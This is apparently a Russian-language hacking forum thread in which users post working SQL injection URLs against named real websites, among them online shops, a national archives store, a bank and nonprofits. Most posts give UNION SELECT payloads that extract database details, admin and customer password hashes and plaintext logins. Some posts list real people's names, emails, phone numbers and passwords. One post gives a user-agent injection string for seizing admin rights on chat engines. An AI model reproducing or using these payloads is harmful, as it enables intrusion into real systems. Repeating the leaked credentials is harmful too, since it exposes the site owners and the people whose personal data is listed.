китайский шоп http://www.chinatown.com.au/shope/viewdetail.asp?id=1'%20or%201=(SELECT+@@version)-- админки шопа не нашол нашол только эту http://www.chinatown.com.au/henry/admin/ henry:chinatown кому интересно ковыряйте дальше
А смотрите... вот таблица cpg_users с колонкой user_password и user_name почему не получается сделать запрос к этим колонкам? Я пробовал
http://www.emobila.com.ro Code: http://www.emobila.com.ro/detalii_categorii.php?id=-10+union+select+1,2,3,concat_ws(version(),0x3a,user(),0x3a,database()),5,6,7,8,9,10/* version() - 4.1.20-log user() - [email protected] database() - netemobilaro
http://www.bogdanlobont.ro/ro/news/view?newsId=268+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(id,0x3a,user_login,0x3a,user_pass),10+from+wp_users/* :1admin1:1$P$Bs8ERbDq2W5FOIL14yZrI4rX1AEbuT0'
http://www.probeg.ru Code: http://www.probeg.ru/news.php?action=read&id=-75+union+select+1,2,3,4,version(),6,7,8/* version() - 4.1.22-standard-log user() - probegru@localhost database() - probegru_probeg Чет одни 4-е версии пошли(...
Исследуем интересный сайтег... Ух ты. Shop National Archives of Australia Поставим перед собой задачу: достать логин/пасс админа. Действуем: https://shop.naa.gov.au Code: https://shop.naa.gov.au/browse_cat.php?cat=-42+union+select+version(),2,3/* version() - 5.0.20-Debian_1-log user() - [email protected] database() - naacart Версия > 5 это хорошо. Code: https://shop.naa.gov.au/browse_cat.php?cat=-42+union+select+table_name,2,3+from+information_schema.tables+limit+1,1/* Находим интересную табличку admin. Изучаем ее: Code: https://shop.naa.gov.au/browse_cat.php?cat=-42+union+select+column_name,2,3+from+information_schema.columns+where+table_name=0x61646d696e+limit+0,1/* Что имеем? Code: id, email_address, password, SiteID, Creation, LastUpdate, common_name Заинтересовали id и password. Смотрим: Code: https://shop.naa.gov.au/browse_cat.php?cat=-42+union+select+concat_ws(id,0x3a,password),2,3+from+admin-- мм.. пока сохраним. Пойдем исследовать таблички дальше. Всего там 38 табличек. Находим еще одну интересную - customer. Изучаем. В ходе изучения выяснили, что таблица customer почти одинакова по строению с таблицей admin, только еще имеется личная инфа людей в этой БД и другое. Попробуем вытащить id и password из этой таблицы: Code: https://shop.naa.gov.au/browse_cat.php?cat=-42+union+select+concat_ws(id,0x3a,password),2,3+from+customer+limit+0,1-- Давайте узнаем ID и password первого админа: Code: https://shop.naa.gov.au/browse_cat.php?cat=-42+union+select+concat_ws(id,0x3a,password),2,3+from+admin+limit+0,1-- Получаем: 1 : 517c617e61a97d5d Есть. ID и пароли мы получили. Что естественно было и нашей первоначальной задачей
http://test.uhyips.com/adsorder?id=-1+union+select+1,2,concat(username,0x3a3a,password),4,5,6+from+u60233_new.hyip_user+limit+0,1/* login: Виктор pass: 1234 Какая-то шняга
http://www.revistadelconsumidor.cl/articulos/contenidos.php?ID_Articulo=-1+union+select+1,2,3,4,5,6,7,8,concat(nom_usuario,0x3a3a,password),10,11,12,13,14,15,16,17+from+tbusuarios/* login: claudio pass: tchpc http://www.revistadelconsumidor.cl/admin/
Лодочки http://www.kayakextrem.ru/olist.php?id_=1+union+select+1,2,user(),4,5,6,7/* version() 4.0.26 user() [email protected] database() wwwkayakextremru Золотой шоп http://dageena.com/subcategory.php?catid=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11/* 4.1.20-max-logutsour_dageena[email protected] поисковик шопов или полушоп хз вобщем http://www.lowyeah.com/store.php?store_id=-1+union+select+concat_ws(0x3a,user(),version(),database()) lowyeah@localhost:4.0.26:lowye</title>
Code: http://www4.virgula.com.br/realitymusical/nota.php?id=1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9,10/* Code: http://www.agenciapulsar.org/nota.php?id=1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9,10,11,12/*
Вот сегодня шоп попался Cайт:www.rocklandshop.spb.ru Code: http://www.rocklandshop.spb.ru/item.php?id=-43477+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11/* Version:5.0.32-Debian_7etch3-log User:zorro_rockland@localhost DataBase:zorro_rockland Идём дальше,cмотрим что у нас в INFORMATION_SCHEMA.TABLES: Code: about action adidas_info anketa art base city comment contacts exclusive_info features file_stat glossary goods info ip2country links menu network news nike_info orders partners poisk presentation presentation_copy reebok_info salomon_info search sites subscribe user user_dopcat vacancy video wallpaper work Заинтересовала табличка user: Cмотрим поля через лимит: Code: http://www.rocklandshop.spb.ru/item.php?id=-43477+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10,11+FROM+INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=0x75736572+limit+0,1/* Находим заинтересовавшие нас поля: Code: user psw email И наконец выводим их: Code: http://www.rocklandshop.spb.ru/item.php?id=-43477+union+select+1,2,3,concat_ws(0x3a,user,psw,email),5,6,7,8,9,10,11+FROM+user/*
Code: http://www.cz-usa.com/product_detail.php?id=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6%20LIMIT%201,1/* Code: http://www.bluestars.org/story.php?story_id=-1+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6/* Code: http://www.fruehstyxradio.de/shop.php?artikel=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10%20LIMIT%201,1/*
Все нашел сам! Не повторяються! http://www.freepoc.de/viewapp.php?id=-12+union+select+1,2,3,4,5,6,7,version()/* --------------------------------------------------------------------------------------------- http://www.generalsemantics.org/inner.php?page=news&id=-9+union+select+1,2,3,concat_ws(0x3a,UserName,LoginName,PassWord,email,phoneNo)+from+tbl_adminusers-- Lance Strate:lstrate:heroes:[email protected]:201-921-4745 Marty Levinson:Marty:Fairytales:[email protected]:718-793-6621 nmtucson:nmtucson:justme:[email protected]:520-225-0476 Jennifer Clarke:jennifer:56375637:[email protected]:817-922-9950 Админка http://www.generalsemantics.org/admin/login.php -------------------------------------------------------------------- http://www.korova.ru/humor/viewer.php?id=-32+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18-- 4.0.27-max-log --------------------------------------------------------------------- http://www.arcadepod.com/games/details.php?id=-3937+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 4.1.20 PR=5 --------------------------------------------------------------------- http://www.teatrdoc.ru/plays.php?id=-5+union+select+1,2,version(,4,5-- 4.1.22 http://www.sumw.com/index.php?page=products&pid=-1+UNION+SELECT+1,2,3,4,5,version(),7,8-- http://zvezda.ru/file.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,version(,11-- http://www.teatrdoc.ru/plays.php?id=-5+union+select+1,2,version(),4,5-- ------------------------------ http://www.dubkow-muehle.de/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(version(),0x3a,user(),0x3a,database())-- version() - 5.0.45 ------------------------------ http://www.asud.net/Iniziative/iniziativa.php?in=1+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8-- 4.1.22-standard-log ------------------------------ http://www.cenn.org/index.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,version(),17,18,19,20,21,22,23-- 4.1.14 --------------------- http://www.lcoastpress.com/book.php?id=-99+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 4.1.22 lcpadmin : plQAxyWbMGJyQ Таблица user --------------------- http://www.icehw.net/article.php?id=-99+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16-- 5.0.22-Debian_0ubuntu6.06.3-log table: login Concat_ws(0x3a,ID,username,PASSWORD) --------------------- http://www.ecuadorminingnews.com/news.php?id=-99+union+select+1,2-- -------------------------------------- http://www.rezina.biz/show.php?id=-27+union+select+1,2,version(),4,5,6,7-- 4.0.27-max-log --------------------------------------- http://www.eatmybrains.com/showfeature.php?id=-27+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16-- 5.0.51a-community Таблица user но в ней нет колнки с пасами! ---------------------------------------- http://www.satire.ru/actor_detail.php?id=-31+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13-- 4.1.22 ----------------- http://www.zaistinu.ru/articles/?sid=-29+union+select+version()-- 5.0.32-Debian_7etch6-log ----------------- http://www.iped.com/cm.php?id=-38'+union+select+1,concat_ws(0x3a,username,password),3,4,5+from+iped.user+limit+1,1-- ----------------- MTV http://www.mtvphil.com/news.php?id=-17+union+select+1,2,version(),4,5,6,7,8,9,10,11-- 4.1.22-standard ----------------- http://www.whitestrip.ru/article.php?id=-49+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15+from+information_schema.tables+limit+1,1-- ----------------- http://okwildlife.org/news.php?id=-48+union+select+1,2,3,version(),5,6-- 4.1.21-community-nt ----------------- http://www.nebraska-outdoors.com/articles/article.php?aid=-1+union+select+concat(username,0x3a3a,pass)+from+users+limit+2,1-- login:brianficek pass:85688717ef4fab9 ----------------- http://vli-info.ru/index.php?p=show_cont&parent_id=-1+union+select+1,2,3,concat(login,0x3a3a,password,0x3a3a,admin),5,6,7+from+users+limit+0,1-- admin::5416d7cd6ef195a0f7622a9c56b55e84 ----------------- http://www.info.gomel.by/news.php?id=-12+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),DATABASE()),6,7,8,9,10,11,12-- 4.0.18:artbase ----------------- http://www.kidtokid.com/news.php?id=-13+union+select+1,2,3,4,5,6,7,8,9-- ----------------- http://www.idcfl.com/news.php?id=-2+union+select+1,table_name,3+from+information_schema.tables+limit+1,1-- ----------------- http://www.videodep.com/news.php?id=-23+union+select+1,concat_ws(0x3a,id,username,password),3,4+from+users+limit+0,1-- http://www.videodep.com/news.php?id=-23+union+select+1,concat_ws(0x3a,username,password,id),3,4+from+admin-- http://www.videodep.com/users/ http://www.videodep.com/admin/ drew:test ------------------ Выбирал себе котлы, и случайно увидел id=7 Вот что из этого получилось, но нет табл с пассами, так бы может нахаляву заказал бы))) http://www.clockmarket.ru/catalog/index.php?brand_id=-7+union+select+1,table_name,3+from+information_schema.tables+limit+0,1-- -------------------
Первое сообщение первый взлом. В общем пароли в неприкрытом виде да вообще все неприкрыто. Сайт: http://northlove.ru Code: http://northlove.ru/stati.php?p=2&r=1'+UNION+SELECT+1,password,name,4, 5,6,id,8+ from+users/* Mysql version 5.0.45 database love user root@localhost Буду рад за какие нить подсказки....*)
Промсвязьбанк target: http://www.psbank.ru SQL: http://www.psbank.ru/news/bank/-9722'+union+select+1,2,3,4,5,6,'sql/*.html http://www.psbank.ru/person/-46'+union+select+1,2,'/*/ раскрытие пути: /home/www/webadmin/inc/pfunc.php SELECT * FROM PSBNEWS WHERE "id" = '*' SELECT "dir" , "title" as "title" , "id" , "pid" , "hiddenLink" , "cod" FROM CATALOGUE_FIN WHERE "dir" = 'news' or "dir" = 'bank' or "dir" = '-9722' + union + select + 1 , 2 , 3 , 4 , 5 + where + "id" != '1' ORDER BY "pid" Это все что удалось наковырять. Если у кого что получится больше, отпишитесь плз
Продолжаю Wap тематику! (Цель заполучить админку) Первый сервис wap-чатов 100 чатов==100 админов (; wolk-club.ru Второй чат (того же движка) mmfki.ru Третий чат (того же движка) wap.srb.co.yu Четвертый чат (того же движка) neochat.co.za Пятый чат (того же движка) chat.blaser.h2m.ru Принцип инъекции - подмена юзер агента на Code: antichat', admin='1 Для подмены я использую Ad Muncher (скачать можно Тут ) Иногда приходится зайти в редактирование профиля, чтобы юзер агент обновился! P.S. Тут видео по взломам этого типа движков. (Писалось мной в прошлом году под утерянным ником) P.P.S. Адрес админки admin.php?id=Ваш id&pass=Ваш pass P.P.P.S По поводу того, что сплойт не сработал - пробуйте менять юзер агент при регистрации и при смене профиля! При регистрации на некоторых модификациях движка может выдавать ошибку или бан по IP+Browser! Так же в некоторых движках не фильтруется поле "О себе"
